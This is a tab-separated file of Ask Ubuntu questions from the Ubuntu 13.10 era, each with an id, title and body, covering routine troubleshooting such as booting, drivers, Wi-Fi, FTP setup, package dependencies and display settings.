362937	can not change tracking speed in ubuntu 13.10	it appears in system settings there is no option to change the mouse tracking speed , only double-click speed . i did not originally realise i had changed the double-click speed instead of the tracking speed , but as soon as i did , the speed of the mouse became a linear speed which i can not change - there is no option in the mouse pane of system settings to change the tracking speed . never had this issue in ubuntu 13.04 . if it 's any coincidence , i have a wireless mouse/keyboard combo using a usb transceiver .
362939	i just wan na disable my secure boot policy on win 8 to install ubuntu , how do i do that ?	i tried googlinmg my problem , but could n't quite find a solution for that.i 've got hp pavilion e0539tx pearl white and i wo n't get a secure boot manager in the uefi option after restarting .
362943	rythmbox , shutdown stopped working after 13.10 upgradation	i was upgrading 13.04 to 13.10 and after a while it hanged . i had to forcefully shutdown ( the upgradation was not complete ) but now its saying that i have upgraded to 13.10 but i have the following problems 1.desktop flickers rythmbox not working 3.shutdown button on top right corner also not working i am thinking to again upgrade it to 13.10 . is there a way ?
362944	ubuntu 12.04 can not connect to wired or wireless	im very new to ubuntu and i installed it using a cd alongside with windows 8 . eversince i am not able to connect to the internet . is there any solution ?
362951	installed teamviewer using a 64-bits system , but i get a dependency error	i was trying to install teamviewer , but i was getting a dependency error . i tried to install them , but with no luck . i 'm getting this error : unpacking teamviewer ( from teamviewer_linux_x64.deb ) ... dpkg : dependency problems prevent configuration of teamviewer : teamviewer depends on lib32asound2 ; however : package lib32asound2 is not installed . teamviewer depends on lib32z1 ; however : package lib32z1 is not installed . teamviewer depends on ia32-libs ; however : package ia32-libs is not installed . dpkg : error processing teamviewer ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : teamviewer i tried sudo apt-get -f install getting package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 package lib32asound2 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'lib32asound2 ' has no installation candidate e : package 'ia32-libs ' has no installation candidate i ca n't even get to the sudo dpkg -i teamviewer_linux_x64.deb if i force installation sudo dpkg -- force-depends -i teamviewer_linux_x64.deb although it 's `` setting up temviewer '' it gives me this : how can i fix this problem ?
362953	cheese is crashing when taking video in saucy	it happened in 12.10 and the problem has returned . using version 3.8.3 from software centre . how to fix it ?
362954	mplab x ide installation problem ubuntu 13.10	before upgrading to saucy , i had all my development ides and compilers being installed successfully in 13.04 . now , ever since i have upgraded to saucy , i just simply can not install mplab x and the xc8 compiler . these files have a .run extension and were downloaded straight from the manufacturers . i have tried chmod +x , chmod a+x , etc and no result . another thing to note is that my qt .run file executed and installed successfully . anybody else facing this problem . i am not new to linux , but still have no idea why this is happening . could it be that since 13.10 has no ia32-libs since its multiarch ? the mplab product website says to have ia32-libs installed . i did it for previous ubuntu versions , but since the package itself is absent , any other solution to get the installer to work ? edit : never mind that . instead of the package ia32-libs , you now have `` lib32z1 '' . simply install that and you should be able to install the package . hope this helps everyone . sudo apt-get install lib32z1
362955	how to require password for file deletion ?	i would like to have a password needed when trying to delete a file from certain folders ( if not available then for the whole system is also good ) looked everywhere here and in google ... did n't find : ( thanks in advance : ) !
362956	line 7 : ca n't open /dev/sda no medium found	i 'm trying to install ubuntu 13.04 but ubuntu 13.04 installation hangs on this ( i 'm using usb ) /init : line 7 : ca n't open /dev/sda : no medium found /init : line 7 : ca n't open /dev/sdb : no medium found /init : line 7 : ca n't open /dev/sdc : no medium found /init : line 7 : ca n't open /dev/sdd : no medium found /init : line 7 : ca n't open /dev/sde : no medium found timeout '/sbin/blkid -o udev -p /dev/loop0'
362959	reading a file line by line	i have a file that looks like : @ atdggsgdtsg ntccccc + nddhdhnadn @ atdggsgdtsg ntccccc + nddhdhnadn now its a repeating pattern of `` 4 '' lines and i every time want to print only the 2nd line i.e . the line after the line starting with `` @ '' i.e 2nd line..6th line..etc . how can i do it ?
362964	acer a0533 netbook , will it run the latest ubuntu ?	i have an acer a0533 atom cpu n455 1.66 1 gb ram will it run the latest 32 bit ubuntu ?
362967	online accounts advanced setting with empathy ( 13.10 )	the new online accounts does n't have the advanced settings as the empathy accounts had . how do i change the google server to connect to ? i read here : https : //wiki.gnome.org/empathy/faq i ca n't connect to my google talk account your router is probably blocking dns srv requests . if possible you should try to fix it . if you ca n't , the easiest work around is to set `` talk.google.com '' in the `` server '' field of the advanced section of the account . so i think this might fix my problem , or maybe just an option to shift the port it connects to . and is there anyone that knows how to use join any irc channels with empathy ? i have installed the plugin , but i do n't know how to join a channel .
362968	usb gets disabled when i boot in linux 3.5.7 / ( ubuntu 12.04 )	i have connected usb keyboard & mouse to core i7 intel processor.when i boot my system in ubuntu with kernel 3.2.21 it runs properly i.e usb keyboard & usb mouse works satisfactorily . issue when i boot my system in linux ( ubuntu 3.5.7 ) usb keyboard & usb mouse stops working.i have to boot my system by pressing `` e '' and then `` enter '' i.e it directly links with the hardware.mouse doesnt get power i.e laser under my optical mouse doesnt glow . kindly help me .
362969	webcam not `` detected '' - ubuntu 12.04	i have a usb microsoft livecam nx-3000 webcam connected to an ubuntu 12.04 laptop . ( lsusb : bus 001 device 003 : id 045e:0721 microsoft corp. lifecam nx-3000 ( uvc-compliant ) ) under windows 7 and ununtu 13.04 works fine . in ubuntu 12.04 i get cheese : no device found , but in sound i can choose webcams microphone . any solutions ? thanks
362971	number pad is not working	after new installation of ubuntu 13.10 64 bit , i face there is problem in my keypad . i face my keypad is not working . then i realize that it functioning but it behave like a mouse pointer . i can see there is no effect of number led on / off . i can see number led change its states but not my number key pad .
362972	global menu not working in 13.10	after upgrading to 13.10 the global menu does n't show for some applications like terminal and chrome . is this a bug or is it normal ? thanks in advance .
362973	keyboard layout switches to english each time i reboot	i just installed ubuntu 13.10 , and really enjoy it . i am from denmark , and use the supported danish keyboard-layout ( and chose it as default in the install ) , but whenever i reboot ubuntu switches back to english keyboard-layout , though the little icon in the panel says it 's in danish . i have to click on the icon every time to change it back to danish . i tried removing the english keyboard-layout , but it did n't help . any suggestions ?
362975	ubuntu / filezilla ftp set up	i have successfully installed vsftpd and i have configured it to allow ftp connection from my windows laptop running filezilla . filezilla is pointing at the directory srv/ftp on my server ; the files that are stored in srv/ftp are showing in the remote site section of filezilla . this indicates that it is connecting to my ftp server . what i need to do is point filezilla toward the directory var/www so that all files that i transfer are visible on my self-hosted website . i can not find out how to do this . do i need to perform some updates to the vsftpd.conf file , and if so what do i change ? do i need to perform updates to my filezilla console ? i am comfortable in terms of changing .conf files , port forwarding and setting permissions etc . i just need to know what precisely needs to be changed . much love ...
362977	what command are my volume keys running ?	in unity i use my thinkpad hot keys to change the volume . i need to know the command that these keys run so that i can bind it in my window manager . i have tried using amixer but could not change the volume through command line amixer set master 10 % - amixer : unable to find simple control 'master',0 amixer scontrols : simple mixer control 'iec958',0 amixer set 'iec958 ' 50 % - amixer : invalid command ! so obviously this is not what unity is running . i have tried changing the default sound card as well but that did n't help .
362979	automatically change hosts file	i have a server on my house to proves and when i 'm on my laptop in my house i have to write the local ip to see the web server , and i want to know if it is possible write a script to automatically detect the network and add the line on hosts file , and when is in other network delete this line . thanks .
362980	gedit external tools plugin failed to load	i had gedit configured with some plugins but after upgrading to 13.10 , every time i go the gedit plugins and try to load the external tools i get a message saying : failed to load . not sure how to fix this . tried reinstalling but this did n't help
362986	get uniform notification background in 13.10 gnome-panel	the notifications in ubuntu 13.10 using gnome-panel have changed . they look more gnome-like , have a x to close it and â my problem â they have a grey rectangular box behind the text , inside and in addition to the usual good-looking black rounded box . this only happens for the gnome-panel ( gnome fallback ) desktop . in unity they look nice . how can i change the colours to get a uniform background again in gnome-panel ?
362988	failed to load session ''ubuntu '' after upgrade	i upgraded from 11.04 to 12.04 . after closing the computer and trying to login again , it presented me with failed to load session `` ubuntu '' . what can i do to rectify the problem ?
362989	not logging in blank screen after login with system error message	when i start my pc it gets to the logon screen , then i put in the correct details . then a blank screen appears , and a message saying system error has occured , cancel or report now so i tried cancel and report now both do nothing i can click it 3 times and then it goes away but my screen still stays blank . this happened out of the blue was working great then next day i try to login and bham problems . when using the startx command ; the only error that appears is `` warning type `` one_level '' has 1 levels but has 2 symbols . ignoring extra symbols . the xkeyboard compiler reports .
362994	the system is running in low-graphics mode and black screen after installing ( upgrading from 12.10 ) ubuntu 13	after installing ubuntu 13 i have experienced some errors at the startup . in particular the system says : `` the system is running in low-graphics mode '' and , if i would continue also in low-graphics mode , the login panel does n't appear . there is a black screen instead . i have no idea of which problem could determine this and obviously how to fix it . i hope i will get some replies . thank you in advance : ) edit : i have updated it from the 12.10 version and i have an integrated video card . my processor it 's and amd sempron 2600+ with 1 gb ram but i have no other details on spec . i tried to reinstall and then install lightdm and gdm after the upgrade with no results .
363003	no internet connection on virtualbox ( windows 7 as guest , ubuntu 13.04 as host )	internet works perfectly on host ( ubuntu 13.04 , 32 bit , fully updated ) but can not connect to internet on guest windows 7 ( under virtualbox 4.2 ) . have tried nat and bridge network - none worked . i had internet connection in the guest os a couple of months ago , but i have n't tried the virtualbox since and now it 's gone for some reason . i would be grateful if someone could help me re-connect the windows os back online ( without the need to format my computer or to uninstall and re-install the guest os ) . thanks !
363009	will ubuntu touch support nexus 7 in the future	will ubuntu touch support nexus 7 rev.2 in the future ( or is there a version available right now ) ?
363013	only erease disk and something else options when installing ubuntu along windows 8	how do i install ubuntu 13.10 and dual boot windows 8.1 pro ? when i boot the installation usb i only get 2 options : `` erase disk and install ubuntu 13.10 '' , or `` something else '' . i tried `` something else '' but i do n't know how to install it on a partition .
363014	flash game run slow and lagging	i try to play 3d flash games on my ubuntu 12.04 and its run slow , youtube runs just fine my spec . memory 2gb , processor intel dualcore 3.2 graphic unknow , hard drive 150 gb .
363016	qt 5.1 packages	is there any ppa containing qt 5.1 prebuilt binary packages ? i found this one , but it does n't seem really well-provided . i 'm running raring , but i see that even saucy still has qt 5.0.2 .
363017	how to install php 5.4.x on ubuntu 13.10 saucy salamander	how do i install php 5.4 on ubuntu 13.10 saucy ? on ppa : ondrej/php5-oldstable ( https : //launchpad.net/~ondrej/+archive/php5-oldstable ) there are only packages up to 13.04 please help . thank you , michael
363018	ubuntu 12.04 lts - vsftpd problem . no connection . connection refused	i have a problem with vsftpd server running on ubuntu 12.04 lts . here is the configuration : ubuntu server address - 192.168.5.100 router address - 192.168.5.1 roger/ # grep -v `` # '' /etc/vsftpd.conf listen=yes anonymous_enable=no local_enable=yes write_enable=yes anon_upload_enable=no anon_mkdir_write_enable=no dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=no xferlog_file=/var/log/vsftpd.log xferlog_std_format=yes idle_session_timeout=180 ftpd_banner=welcome to rogers ftp s1rvices . chroot_local_user=yes chroot_list_enable=yes chroot_list_file=/etc/vsftpd.chroot_list secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem listen_port=16499 pasv_min_port=34720 pasv_max_port=34722 max_clients=1 max_per_ip=1 max_login_fails=4 tcp_wrappers=yes seccomp_sandbox=no in my router ( fritzbox ) the tcp ports 34720-34722 and 28001 ( redirected to 16499 ) are opened and redirected to ubuntu servers address - 192.168.5.100 . i tried to connect about telnet local from the server : # telnet localhost 16499 trying : :1 ... trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused i canâ´t find the way to resolve this problem . help me plz .
363019	ca n't boot after update , purple/black screen	i am dual-booting ubuntu and windows 7 . yesterday i 've installed many updates ( including many system software ) on ubuntu . after the restart it could n't boot anymore . i just get first a purple screen and then just a black screen , when i start the normal boot . when i can choose the recovery mode , i can boot ubuntu . i have tried to fix all the packages in recovery mode but that does n't help .
363020	disabling app menu in ubuntu 13.10 seems to have affected files ( nautilus )	ubuntu 13.10 the app menu integration in ubuntu , prevents usage of short-cut based on alt+ underlined words . in the help documentation there is an option to remove the app menu integration . ( under `` manage app and settings with the menu bar '' the online documentation link is here ) . this option was probably not there in ubuntu 12.10 , so do take a look at the documentation to understand how this works say by looking at the packages it removes . after removal , the menu is visible for apps like libre-office and firefox and the alt+ underlined word short-cut is working . however the app menu for files ( earlier known as nautilus ) is not visible . as a result i am unable to set/reset preferences for the file manager . how to restore the app menu for files ? is there an alternative way for configuring files ? thanks
363022	launcher auto hide ; disable pressure	how it currently works : when i move my cursor to the left border of my screen , the sidebar is revealed sometimes but sometimes nothing happens . i think it has to do something with speed and sometimes there is some kind of shadow , when i `` press '' against the border and sometimes the launcher is revealed when i `` press '' further after seeing the shadows . but it really is a behaviour i can not understand or reproduce and it really annoys me . what i want : i want my launcher ( the left sidebar with the application icons ) to hide automatically and be revealed when i move my cursor to the very left side of the screen . it should be really simple , just based on the position of the cursor , just as it is done in docky . i already tried setting reveal sensitivity to very high in the settings and used ccsm to set the reveal pressure as low as possible . it improves the behaviour , but it still is annoying . i also tried changing the other settings in the launcher tab of ccsm , but they do not have much effect for me . how can i disable this `` smart '' behaviour of the sidebar completely ?
363025	dell xps-l502x volume keys do n't work in ubuntu 13.10 ?	my dell xps l502x volume function keys do n't work after installing ubuntu 13.10 . they were working fine in ubuntu 13.04 .
363027	postfix mail trailing	we had an incident with an email trailing from one localserver to another . the mail startet trailing 06:42:53 and succeeded at 09:24:55 mail.log oct 20 08:18:16 godzilla postfix/smtp [ 4108 ] : 9518613fb : to= < root @ hd.se > , orig_to= < root > , relay=none , delay=5724 , delays=5703/0.01/21/0 , dsn=4.4.1 , status=deferred ** ( connect to 192.168.209.20 [ 192.168.209.20 ] :25 : connection timed out ) ** oct 20 09:24:55 godzilla postfix/qmgr [ 1021 ] : 9518613fb : from= < root @ hd.se > , size=685 , nrcpt=1 ( queue active ) oct 20 09:24:55 godzilla postfix/smtp [ 5200 ] : 9518613fb : to= < root @ hd.se > , orig_to=** < root > , relay=192.168.209.20 [ 192.168.209.20 ] :25 , delay=9723 , delays=9723/0.01/0.02/0.02 , dsn=2.0.0 , status=sent ( 250 2.0.0 ok : queued as 033157b6f ) ** oct 20 09:24:55 godzilla postfix/qmgr [ 1021 ] : 9518613fb : removed oct 21 13:18:30 godzilla postfix/smtpd [ 1277 ] : connect from localhost [ 127.0.0.1 ] oct 21 13:23:30 godzilla postfix/smtpd [ 1277 ] : timeout after connect from localhost [ 127.0.0.1 ] oct 21 13:23:30 godzilla postfix/smtpd [ 1277 ] : disconnect from localhost [ 127.0.0.1 ] error.log netadmin @ godzilla : /var/log/apache2 $ cat error.log [ sun oct 20 06:42:53 2013 ] [ warn ] rsa server certificate commonname ( cn ) `godzilla ' does not match server name ! ? [ sun oct 20 06:42:53 2013 ] [ notice ] apache/2.2.14 ( ubuntu ) dav/2 svn/1.6.6 mod_ssl/2.2.14 openssl/0.9.8k configured -- resuming normal operations daemon.log.1 oct 20 06:35:02 godzilla nrpe [ 2153 ] : error : could not complete ssl handshake . 5 oct 20 06:40:02 godzilla nrpe [ 2236 ] : error : could not complete ssl handshake . 5 oct 20 06:42:50 godzilla named [ 847 ] : error ( network unreachable ) resolving 'nixon.acc.umu.se/a/in ' : 2001:6b0 : e:3 : :1 # 53 syslog.1 oct 21 06:17:01 godzilla cron [ 26187 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) oct 21 06:20:02 godzilla nrpe [ 26212 ] : error : could not complete ssl handshake . 5 oct 21 06:25:01 godzilla cron [ 26296 ] : ( root ) cmd ( test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) ) oct 21 06:25:02 godzilla nrpe [ 26322 ] : error : could not complete ssl handshake . 5 oct 21 06:30:03 godzilla nrpe [ 26404 ] : error : could not complete ssl handshake . 5 oct 21 06:35:02 godzilla nrpe [ 26487 ] : error : could not complete ssl handshake . 5 oct 21 06:40:02 godzilla nrpe [ 26570 ] : error : could not complete ssl handshake . 5 oct 21 06:43:51 godzilla named [ 847 ] : error ( network unreachable ) resolving 'nixon.acc.umu.se/a/in ' : 2001:6b0:7 : :2 # 53
363028	infected by rootkit . how do i remove it ?	today , i launched tiger , which did report a root kit alert . chkrootkit did agree . how can i remove this root kit ? how can i find how it was installed , so i can take care of the weakness in my ubuntu 12.04 lts web server ? report of tiger : # performing check for rookits ... # running chkrootkit ( /usr/sbin/chkrootkit ) to perform further checks ... -- alert -- [ rootkit005a ] chkrootkit has found a file which seems to be infected because of a rootkit -- alert -- [ rootkit009a ] a rootkit seems to be installed in the system infected ( ports : 465 ) report of chkrootkit : checking `bindshell ' ... infected ( ports : 465 ) additional details : $ netstat -- all -- numeric-ports -- program |grep 465 tcp 0 0 0.0.0.0:465 0.0.0.0 : * listen 2283/master tcp6 0 0 : ::465 : : : * listen 2283/master
363031	how to create a windows bootable usb ?	how to make a bootable usb . i am using ubuntu 13.04 lts and want to make a bootable usb to install windows suggest any ubuntu based usb creators to make a bootable windows flash drive .
363032	ca n't boot into ubuntu ! please help	hello i am new to ubuntu and for the first time installed it today , but i ca n't boot into it . i installed it and at the end of the install it said it needed to restart so i pressed restart and my pc booted into windows . so i restarted my pc again and this time press del ( my button to bring up the bios ) but there where only 2 places to boot into both of which boot me into windows . maybe this screen shot will help ? http : //i.stack.imgur.com/tm6f1.png
363036	how to enable hibernate on ubuntu 13.10 ?	something i usually do after installing ubuntu is reactivate the hibernation function . i find it quite useful to function for the more energy concious . typically , i 'd complete the instructions in this tutorial for ubuntu 12.04 and i 'd be back in business . however , it does seem to work any more . any suggestions ? http : //www.howtogeek.com/113923/how-to-re-enable-hibernate-in-ubuntu-12.04/ sudo gedit /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla [ enable hibernate ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes
363040	wifi hard disabled until suspend	i 've tried searching for this problem , but it seems more common to have the opposite issue . whenever i boot into 13.10 , the wifi is disabled . i check rfkill list and it says that it is hard disabled . no amount of pushing fn+f2 on my asus f550c seems to work . however , if i suspend the system , then wake it up , the wifi is magically working again . ( it seems most people have the opposite issue where it stops working after waking up from a suspend ) . is there any known issue causing this ? if so , is there a way i can get it to work on first boot ? i have already checked the bios as well , and there is nothing disabling it there ( google told me to check haha ) . thanks : )
363043	how to undo a setting on xolo qc800 ?	on my xolo qc800 tablet there was a setting in data usage about stopping internet connection after a certain limit . i set the limit for 500mb . now how do i undo that change ? there is no option given for it now .
363045	standalone installation of ubuntu 13.10	i have windows 8 installed on my pc and now i want to install ubuntu 13.10 as a standalone os i.e . i dont want to keep windows 8 . i have 3 partition on my hdd . 350 mb ( boot files in ntfs ) 100 gb ( windows 8 in ntfs ) 600 gb ( data in ntfs ) i dont have backup method to backup my data on 600 gb partition so how do i install ubuntu . can anyone tell in detailed manner and also i want to install it from usb . can i access data after installation which is in ntfs format .
363047	hp colorlaserjet 2605dn printer	after updating from 13.04 to 13.10 ( both 64amd ) my network printer is detected , but it does not print . my printer is connected to a iomega isx200 for printer sharing on my home network . it works on all other pcs ( windoze and apple ) . i really need my printer to be able to print . please can someone help ?
363048	unable to mount location of hard drive	okay , so this is the case . i had 3 partitions namely c , d and e on my 320gb hdd . i had windows 7 installed in `` c '' partition , now , i installed ubuntu 12.10 desktop -i386 from a bootable usb . i selected `` replace ubuntu with windows 7 ( probably the second option while installation ) '' . now , i have a problem here . i see 2 partitions , namely `` 320gb hard disk '' and `` file system '' . when i click to open `` 320gb hdd '' option . i get an error saying '' unable to mount location '' , `` ca n't mount file '' i suppose that i have lost all the data i had on my hdd , and now , how am i supposed to retrieve it or use this hdd and make partitions ? .. please help me . thank you
363049	during dual boot of windows and ubuntu windows does not load	on windows 8 preinstalled laptop ( uefi ) i tried to dual boot it with ubuntu 13.10 64 bit after installation grub did not appear . then i installed easybcd on windows 8 then i tried to dual boot ubuntu with windows it didnot work . then accidentally i changed the boot location from c drive to \boot then none of the os run properly . i can easyly format my computer and load ubuntu into it but i have to save the costly windows 8 original version.please reply asap ! ! !
363050	black flickering lines showing on the screen after booting ubuntu 12.04.3 in my vaio sve15136cn ( dual boot with win8 ) amd radeon 7500m	i have a sony vaio running on dual boot with windows 8 x64 recently updated to 8.1 and ubuntu 12.04.3 x64 by disabling secure boot but uefi is enabled . i have repaired the boot and now i can select from various options to run ubuntu or windows 8. win 8 is running fine but when i try to run ubuntu black flickering lines start showing.i can see the window beneath it and do a little work also but only if i press e in the grub menu on ubuntu option and replace splash by radeon.modest=0 and selecting 2d mode in login , as specified in some other forums . but i am a beginner so i would need step wise instructions . please help as soon as possible . i believe that it is because ubuntu is not supporting amd 7500/7600m driver . please help asap , thank you
363052	ubuntu not booting up	i installed ubuntu 13.10 on my laptop which was running windows xp . this is what i did : downloaded ubuntu 13.10 launched it in .exe ( ? ) my pcâ rebooted . there is no display any more , and no bios any more . what should i do ? original post in french : http : //askubuntu.com/revisions/363052/1
363053	get list of all commands run in past with sudo apt-get install in terminal	as per command history in ubuntu terminal we can see all previous command we run on system . i want to know how can we get all previous command which starts with some words/characters . example : i want to list of all commands i run using sudo apt-get install or pip install .
363055	wireless not working in ubuntu 12.04 in my lenovo z580	well i 'm still a newbie in ubuntu . i 'm using ubuntu 12.04 precise edition version . the problem is my wifi connection . i 've been working on it since far too long all by myself and now i think i have really messed it up and i need some expert help . i read many threads of this forum which were related to my problem and still it did n't work for me . now the situation is , even rfkill list all command shows nothing . : ( please help ! !
363057	slow download speed ubuntu 13.10	so , i just downloaded ubuntu 13.10 and i noticed my download is very slow . i tried to download some games through steam and usually i have a speed of 1.5mb/s now it 's between 500 kb/s and 1 mb/s all the time ... i already tried some fixes i found on this website but nothing seemed to work . any help would be hugely appreciated : d edit : my connection is wired .
363058	13.04 to13.10 keyboard failure	while i was updating ubuntu , i had this error . ( filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored i ca n't run mount -o remount , rw / ... .. because my keyboard does n't work .
363065	noip not working on ubuntu 12.10	i have used noip on windows , it 's a great tool . i have also installed it on ubuntu 12.10 , but it seems to be not working somehow . i have apache installed on my machine , i start it with /etc/init.d/apache2 start and then i can see apache 's that `` it works ! '' webpage on localhost:80 . then i start noip client with sudo /usr/local/bin/noip2 where it says ca n't locate configuration file /usr/local/etc/no-ip2.conf . ( try -c ) . ending ! so then when i start it with -c as $ sudo /usr/local/bin/noip2 -c auto configuration for linux client of no-ip.com . please enter the login/email string for no-ip.com my-email-id please enter the password for user 'my-email-id ' my-passworsd only one host [ myhostname.no-ip.org ] is registered to this account . it will be used . please enter an update interval : [ 30 ] do you wish to run something at successful update ? [ n ] ( y/n ) new configuration file '/usr/local/etc/no-ip2.conf ' created . then i suppose the noip client should get started . i check if it 's started by ps -a | grep noip which shows , something like 5498 ? 00:00:00 noip2 but then when i check in a browser using myhostname.no-ip.org or myhostname.no-ip.org:80 , it just does n't open that apache page . i tried with tomcat server as well , but no luck .
363068	took 8 hours to transfer 12 gb	i needed to transfer vmware images of an operating system from one machine to another in my network , it took 8 hours bottom of image you can see time taken , the connection was done using ssh ( encrypted connection was slow ) is there some way to reduce the time taken , because usb drive i have is maximum 8gb , ! [ ssh transfer ] [ 1 ] i tried install vfstpd on machine where i wanted to transfer but i gave up when i got following error this ftp server is anonymous only . login failed . not sure what to do.let me know if there is an easier method which takes less time to transfer file like 12gb in a shorter duration.i am using ubuntu 12.04
363069	dual monitor , permission issue	i had a dual monitor configuration going on for quite some time . one day , after moving the computer to another location and reconnecting everything , it changed such that i saw everything in double ( being very much sober ) , i think it 's called the 'mirrors ' config . anyway , from there on , there was nothing to be done through the system settings gui to change it back , as it would n't allow me to save any modification . the error i get when clicking 'save ' is : '' failed to create file /home/me/monitors.xml.xxxxxx . permission denied '' , xxxx being a random code , changing everytime . however , i can save all the configurations i want just fine by using the terminal , in my case : xrandr -- output dvi-i-1 -- right-of vga-1 so i do have a workaround and this is therefore a question more out of curiosity . what could possibly have changed to make it impossible to do it through the gui and still letting me change the config using xrandr without being root ? i 'm having a hard time believing it could have anything to do with disconnecting/reconnecting the monitors ... any idea ? thanks !
363070	screen orientation does n't stay in 13.10 ( gnome 3.10 )	i upgraded to 13.10 and gnome 3.10 and now every time i start my computer my second screen resets its screen orientation to normal ( i rotated the monitor counter-clockwise ) . this worked fine in 13.04 and 3.8 across reboots .
363071	multiple monitors using bumblebee on ubuntu 13.10	i 've been unable to get multiple monitors to work with ubuntu 13.10 using nvidia-prime or bumblebee . could someone point me in the right direction ? with nvidia-prime , i 've tried the xorg.conf here http : //us.download.nvidia.com/xfree86/linux-x86/319.12/readme/randr14.html , but i boot into `` low graphics '' mode and have to revert to get a desktop back . any suggestions would be appreciated . thanks . edit : i 've given up on nvidia-prime ; i missed the fact that it never turns off the discrete card ... so , i 'm back to trying to get virtual displays working with bumblebee .
363072	wifi , blutooth , web cam is not been detected by ubuntu 12.10 lts	i am using hp pavilion 15 -no11tu which has been awarded the status of enabled for ubuntu . when ubuntu was shiped with my hp laptop , everything worked fine including wifi , webcam and bluthooth . some days ago i formatted my system and reinstalled ubuntu 12.04.3 lts which i downloaded for ubuntu website . but insted of connecting my system to internet and after doing all update and upgrade ubuntu didnt detected my system wifi , bluetooth and webcam . hp does not provide driver support for linux . please help . thanks
363075	.xmodmap does n't work for two layouts	before doing the upgrade to ubuntu 13.10 i was using two layouts for the keyboard - gr & de . i was able to set both in one .xmodmap , means i was able to configure gr and de . now , when i create a .xmodmap it contains only the layout i currently use , but i want both layouts to be in . how can i achieve this ?
363077	problem with synclient : '-m ' flag missing	i 'm trying to set up an action for three finger flick gesture using the instructions given here , and it worked perfectly well before upgrading to kubuntu 13.10 from 13.04 . when i follow the instructions now , the command synclient -m 100 gives this error : synclient : invalid option -- 'm' usage : synclient [ -h ] [ -l ] [ -v ] [ - ? ] [ var1=value1 [ var2=value2 ] ... ] -l list current user settings -v print synclient version string and exit - ? show this help message var=value set user parameter 'var ' to 'value ' . i had added the lines option `` shmconfig '' `` on '' and option `` protocol '' `` event '' to /etc/x11/xorg.conf , and did a restart after it .
363078	ftp login info security	in nautilus , when connecting to a remote server , you can select to remember your password and username forever : is it safe to select this ? with 'safe ' i mean unrecoverable when my hdd get 's mounted without knowing my personal password . the only thing encrypted ( as far as i know ) is my /home folder .
363080	how to skip the downloading update while the terminal is downloading ?	i want to know how to skip the downloading update while the terminal is downloading . i am currently updating from terminal and i want to skip a package from being downloaded because it will consume a lot of time .
363086	indicator menu via 'alt ' in 13.10 / saucy	i used to be able to access the various indicator menus via the app/global menu by pressing 'alt ' . that allowed me to fire up a vpn , change the screen birghtness etc . after upgrading to 13.10 that no longer seems to work and the only menu items i am offered are for the focused application . anyone know how to get access to the indicators back other than 'alt-f10 ' and arrowing through them ?
363087	13.10 ca n't adjust dell laptop backlight	i have a dell studio 1558 . when i originally installed 13.04 on it , i had to modify my /etc/default/grub with the following : grub_cmdline_linux_default= '' acpi_backlight=vendor dell_laptop.backlight=0 quiet splash '' doing that made everything work , the keyboard brightness buttons , the osd in the top right corner , and the brightness slider in system settings . however , upon upgrading to 13.10 , i once again am unable to adjust the backlight . this is also the case if i use either of the following : grub_cmdline_linux_default= '' acpi_backlight=vendor quiet splash '' grub_cmdline_linux_default= '' quiet splash '' the backlight is stuck at a single brightness level , at a guess i think it 's somewhere around 50 % . the osd still comes up if i push the keyboard buttons , but the bar only goes down one division from 100 % and resets back to 100 % , if i press decrease again . the slider in 'system settings ' does nothing . any help is greatly appreciated !
363089	ca n't delete disabled software fonts under other software , after upgrade to saucy ( 13.10 )	i just upgraded from raring to saucy . software & updates > > other software shows disabled entries , saying disabled after upgrade to saucy . i ca n't check or uncheck these disabled entries to delete them . how can i remove them ?
363090	upgraded kernel , wireless does not work	i have a dell latitude e5530 , 64 , with windows and ubuntu 12.10 quantal . i recently updated the kernel and now the wireless does not function . hardware relevant data : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) network controller : broadcom corporation bcm43228 802.11a/b/g/n sd host controller : o2 micro , inc. device 8221 ( rev 05 ) ethernet controller : broadcom corporation netxtreme bcm5761 gigabit ethernet pcie ( rev 10 ) uname produces : 3.11.6-031106-generic # 201310181453 smp fri oct 18 18:54:15 utc 2013 x86_64 x86_64 x86_64 gnu/linux thanks for any help .
363092	ca n't render h.264 video since upgrade to 13.10	neither openshot or kdenlive will render video in h.264 ( preferred youtube format ) since the upgrade to 13.10 . i can render directly to mp4 or avi . i 'm not sure if it is a problem with ffmpeg or mlt .
363093	13.10 : how to bring back one-click song open ?	in the dash music scope , since the update , clicking on the song ( not an album ) displays a secondary menu instead of playing the song . how can i roll back to the good old behavior ?
363097	no menu bar shown on the top panel after upgrading to 13.10	recently i upgrade my ubuntu to 13.10 from 13.04 , i just find the menu bar is not shown on the top panel . the alt key is also not working ! can anyone help me by guiding me to install some packages ? i fixed some other issues just by installing unity-scope-home , indicator-keyboard . so the upgrading ignored some necessary packages to be installed .
363098	error : libpulsecommon-4.0.so : no such file or directory	i get this error for kde apps after upgrading to 13.10 : $ dolphin dolphin : error while loading shared libraries : libpulsecommon-4.0.so : can not open shared object file : no such file or directory how can i solve it ?
